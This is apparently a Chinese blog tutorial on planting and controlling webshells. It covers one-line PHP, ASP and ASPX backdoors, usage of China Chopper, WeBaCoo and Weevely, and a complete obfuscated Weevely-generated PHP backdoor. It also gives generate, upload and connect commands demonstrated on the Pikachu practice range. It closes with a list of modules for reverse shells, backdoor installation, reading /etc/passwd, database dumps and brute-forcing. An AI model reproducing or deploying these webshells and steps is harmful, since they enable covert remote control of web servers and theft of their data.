本質 : 上傳一句話木馬<?php echo shell_exec($_GET[‘cmd‘]);?>
windows平台
中國菜刀
支持asp、php、asp.net和jsp等
可能被IDS、AV、WAF、掃描器軟件發現查殺
使用方法:
往目標web服務器上傳相應的一句話木馬
asp一句話木馬: <%execute(request("pass"))%>
php一句話木馬: <?php @eval($_POST[pass]);?>
<?php
$a = "assert";
$a($_GET['hacker']);
?>
aspx一句話木馬: <%@ Page Language="Jscript"%>
<%eval(Request.Item["pass"])%>
打開中國菜刀,輸入網址和密碼(一句話木馬中的參數) 連接服務端
Linux平台 WeBaCoo(Web Backdoor Cookie)
獲取的是類終端的shell
通信內容base64編碼后通過cookie頭傳輸,隱蔽性較強
缺點是不能指定密碼
cookie中的參數
cm: base64編碼的命令
cn: 服務器用於返回數據的cookie頭的名
cp: 返回信息定界符
使用方法
1、生成服務器端
wenacoo -g -o a.php
2、上傳后用客戶端進行連接
webacoo -t -u http://1.1.1.1/a.php
下面進入主題
個人認為在WIN下,中國菜刀還是很強大的。
但是KALI中也有類似中國菜刀的工具 ——weevely,這里給本人記錄一下,也請大佬們請多多指點……多說無用,直接上菜兒,基本用法步驟如下:
Weevely(只支持PHP)
用http頭進行指令傳輸
隱蔽的類終端PHP Webshell
有30多個管理模塊
執行系統命令、瀏覽文件系統
檢查服務器常見配置錯誤
創建正向、反向TCP Shell連接
通過目標計算機代理HTTP流量
從目標計算機運行端口掃描,滲透內網
支持連接密碼
1. 0x01
首先,KALI終端准備開始搞事;
————————————————
2.0x02
在KALI終端 鍵入命令 weevely 打開工具;(哈哈,我的是4.0.1)
》》》weevely
使用方法
1、生成服務端
weevely generate <password> b.php
生成的文件默認在 /usr/share/weevely/ 目錄下(或者指定目錄或者在當前目錄下執行此命令)
2、 連接客戶端
weevely <URL> <password>
3、 輸入help查看模塊
3.0x03
發現有三個大哥可以用,help其實已經給咱們列出來了,我主用NO.1+NO.3來操作一波。先自動生成后門(path是路徑,password是密碼)
》》》weevely generate limo /root/limo.php
4.0x04
然后在/root 目錄下出現了一個馬兒limo.php,如圖:

1 <?php 2 $U='U3($j<$c&U3&$iU3<$l);$U3jU3++,$i++){$o.=U3U3$t{U3$i}^$k{$j}U3;}}returnU3 $o;U3}if U3(@pU3reg_matU3c'; 3 $B='$k="U39U379243f2";$kh="5U3933cU32536992U3";$kf=U3"1U3U3a2bde2dfeU325";U3$p="eMA7SU3nLWVq1EvE6v";fU3uU'; 4 $h='_end_cleaU3n();$r=U3@bU3ase64_eU3ncode(U3@x(@gzcoU3U3mpress($o),$kU3U3));prinU3tU3("$p$kh$r$kf");}'; 5 $x=str_replace('J','','cJreaJteJJ_funcJJtion'); 6 $P='h("/$kh(.+U3)U3$kf/",@fiU3le_get_cU3U3U3ontents("php://inU3put"),$mU3)==1) {U3@ob_stU3arU3t();@evU'; 7 $D='3al(@gzuncomU3pU3resU3s(@x(@bU3ase64_decodeU3($m[U31]),$k))U3);$o=@U3ob_get_U3conteU3nts();U3@U3ob'; 8 $L='3nction xU3($t,$k)U3{$c=stU3rlen($kU3);$l=U3strleU3U3n($t);$o="";U3for($U3i=0;U3$i<$l;){fU3or($j=0;'; 9 $Q=str_replace('U3','',$B.$L.$U.$P.$D.$h); 10 $v=$x('',$Q);$v(); 11 ?>
5.0x05
將自動生成的馬兒上傳目標網站,獲取馬兒路徑,記得運行解析一下(web上傳不懂的可以百度一下,非常非常非常非常非常非常非常多)
這里用皮卡丘靶場做演示
6.0x06
連接web后門 limo.php ,輸入 URL+密碼,進門~whoami(自己測試web,截圖就不發了)
》》》 weevely http://目標/upload/limo.php limo
└─# weevely http://192.168.1.103/pikachu/vul/unsafeupload/uploads/limo.php limo
weevely 成功連接后門。
基礎操作不足之處請大佬們多多指點。
總結一下weevely常用的模塊
system.info 收集系統信息文件
file.rm 刪除文件
file.read 讀文件
file.upload 上傳本地文件
file.check 檢查文件的權限和
file.enum 在本地詞表的書面枚舉遠程文件
file.download 下載遠程二進制/ASCII文件到本地SQL
sql.query 執行SQL查詢
sql.console 啟動SQL控制台
sql.dump 獲取SQL數據庫轉儲
sql.summary 獲取SQL數據庫中的表和列后門
backdoor.tcp TCP端口后門
backdoor.install 安裝后門
backdoor.reverse_tcp 反彈枚舉
audit.user_files 在用戶家中列舉常見的機密文件
audit.user_web_files 列舉常見的Web文件
audit.etc_passwd 枚舉/etc/passwd查找
find.webdir 查找可寫的web目錄
find.perm 查找權限可讀/寫/可執行文件和目錄
find.name 按名稱查找文件和目錄
find.suidsgid 查找SUID/SGID文件和目錄暴破
bruteforce.sql 暴力破解單一SQL用戶
bruteforce.sql_users 暴力破解SQL密碼
bruteforce.ftp 暴力破解單一FTP用戶
bruteforce.ftp_users 暴力破解FTP密碼